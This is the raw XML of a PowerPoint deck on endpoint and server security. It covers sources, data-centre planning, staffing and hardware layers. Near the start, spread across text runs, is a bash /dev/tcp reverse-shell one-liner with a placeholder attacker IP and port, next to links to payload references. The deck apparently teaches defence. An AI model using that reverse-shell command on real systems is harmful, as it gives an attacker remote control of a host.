            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3C3E3C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tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C3E3C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/10.0.0.1/8080 0&gt;&amp;10&lt;&amp;196;exec 196&lt;&gt;/dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3C3E3C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tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C3E3C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/&lt;your IP&gt;/&lt;same unfiltered port&gt;; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3C3E3C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sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C3E3C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 &lt;&amp;196 &gt;&amp;196 2&gt;&amp;196</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C3E3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C3E3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C3E3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://pravinponnusamy.medium.com/reverse-shell-payloads-969366fa5aff</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3C3E3C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C3E3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C3E3C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://www.offensive-security.com/metasploit-unleashed/binary-payloads/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3C3E3C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3C3E3C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-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80127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11F4B9-1C78-404E-9EE3-4C7E7BBB3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717" y="474250"/>
            <a:ext cx="7940037" cy="5909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74E326-F6C7-0B4D-B22E-97E77D1BC1C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134911" y="6383750"/>
            <a:ext cx="118272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4"/>
              </a:rPr>
              <a:t>https://www.bleepingcomputer.com/news/security/iran-s-atomic-energy-agency-confirms-hack-after-stolen-data-leaked-online/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06796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74E326-F6C7-0B4D-B22E-97E77D1BC1C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134911" y="6383750"/>
            <a:ext cx="118272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3"/>
              </a:rPr>
              <a:t>https://blog.cyble.com/2021/07/05/deep-dive-into-builder-of-notorious-babuk-ransomware/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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E8FB034-8068-2743-8315-56C66C33E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280" y="588884"/>
            <a:ext cx="9588500" cy="466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4204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256A-DA4F-F34D-B5A4-5B76332F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467" y="0"/>
            <a:ext cx="10146186" cy="2511835"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6600" dirty="0"/>
              <a:t>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12CED-BE20-0A4C-B694-10B08D446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5998" y="2511836"/>
            <a:ext cx="10696309" cy="3963916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/>
              <a:t>NIST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-123.pdf</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>	             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-124r1.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>CISA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://thelakewoodscoop.com/news/fbi-and-cisa-issue-joint-ransomware-alert-for-all-healthcare-facilities/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>ISAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://www.cisecurity.org/ei-isac</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>News</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://www.csoonline.com/article/3678311/phishing-attacks-increase-by-over-31-in-third-quarter-report.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://www.linkedin.com/feed/update/urn:li:activity:6991819614439497728?updateEntityUrn=urn%3Ali%3Afs_feedUpdate%3A%28V2%2Curn%3Ali%3Aactivity%3A6991819614439497728%29</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700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784186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256A-DA4F-F34D-B5A4-5B76332F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467" y="0"/>
            <a:ext cx="10146186" cy="2511835"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6600" dirty="0"/>
              <a:t>SERVER SECURITY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12CED-BE20-0A4C-B694-10B08D446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5999" y="3380302"/>
            <a:ext cx="10144654" cy="999885"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>LAYER 1: Installation and Deployment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="345957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6B5F8-B24B-AA4A-8D2F-8B7515465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493439"/>
            <a:ext cx="8610600" cy="1293028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Installation and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ABFDC-CB79-CF4B-A3E3-FF21FDCEB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13468"/>
            <a:ext cx="10820400" cy="480906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Building planning: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Geographical location and hosting Country’s cybercrime &amp; governing laws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Accessibility and climatic conditions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Internet backbone providers’ advancements (5G, optical fibers) and infrastructure security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Construction and Redundancies offered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Capacity planning and future expansion  (Rack density, Server Space, Floor Space etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer Zones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Power Planning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PUE (Power Usage Efficiency)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Power self sufficiency and load capacity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modernization like liquid cool or support for green energy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="2">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Emergency Evacuation Plan and Procedures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="4">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Disaster Recovery Plan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="4">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Emergency Protocol design and building robustness</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2549123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256A-DA4F-F34D-B5A4-5B76332F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467" y="0"/>
            <a:ext cx="10146186" cy="2511835"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6600" dirty="0"/>
              <a:t>SERVER SECURITY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12CED-BE20-0A4C-B694-10B08D446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5999" y="3380302"/>
            <a:ext cx="10144654" cy="999885"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>LAYER 2: Staffing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="666740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6B5F8-B24B-AA4A-8D2F-8B7515465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493439"/>
            <a:ext cx="8610600" cy="1293028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Staffing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ABFDC-CB79-CF4B-A3E3-FF21FDCEB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13468"/>
            <a:ext cx="10820400" cy="4809066"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security Management Staff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Physical Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Entry/Exit protocol and monitoring </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Override Protocols and cross verification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Background Checks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Asset Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server Administrators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network (Routers/Switches) replacement and maintenance staff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Maintenance staff and temporary staff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Janitorial staff</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="3">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Information Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="4">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Separation of concerns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="4">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Localization of information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="4">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef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3891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256A-DA4F-F34D-B5A4-5B76332F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467" y="0"/>
            <a:ext cx="10146186" cy="2511835"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6600" dirty="0"/>
              <a:t>SERVER SECURITY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12CED-BE20-0A4C-B694-10B08D446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5999" y="3380302"/>
            <a:ext cx="10144654" cy="999885"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>LAYER 3: Hardware Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291881304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9845</TotalTime>
  <Words>898</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>138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Georgia</vt:lpstr>
      <vt:lpstr>Menlo</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Vapor Trail</vt:lpstr>
      <vt:lpstr>Why End-Point security is “a must”</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SOURCES</vt:lpstr>
      <vt:lpstr>SERVER SECURITY</vt:lpstr>
      <vt:lpstr>Installation and Deployment</vt:lpstr>
      <vt:lpstr>SERVER SECURITY</vt:lpstr>
      <vt:lpstr>Staffing</vt:lpstr>
      <vt:lpstr>SERVER SECURITY</vt:lpstr>
      <vt:lpstr>Hardware Security</vt:lpstr>
      <vt:lpstr>SERVER SECURITY</vt:lpstr>
      <vt:lpstr>Software Security</vt:lpstr>
      <vt:lpstr>Software Security contd..</vt:lpstr>
      <vt:lpstr>Software Security Client-tier</vt:lpstr>
      <vt:lpstr>WHY STILL GET HACKED</vt:lpstr>
      <vt:lpstr>INJECTION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William Stallings Effective Cybersecurity 1st Edition</dc:title>
  <dc:creator>Kim McLaughlin</dc:creator>
  <cp:lastModifiedBy>Chakraborty, Soubhik</cp:lastModifiedBy>
  <cp:revision>145</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-01-22T03:14:12Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-01T20:56:47Z</dcterms:modified>
</cp:coreProperties>
</file>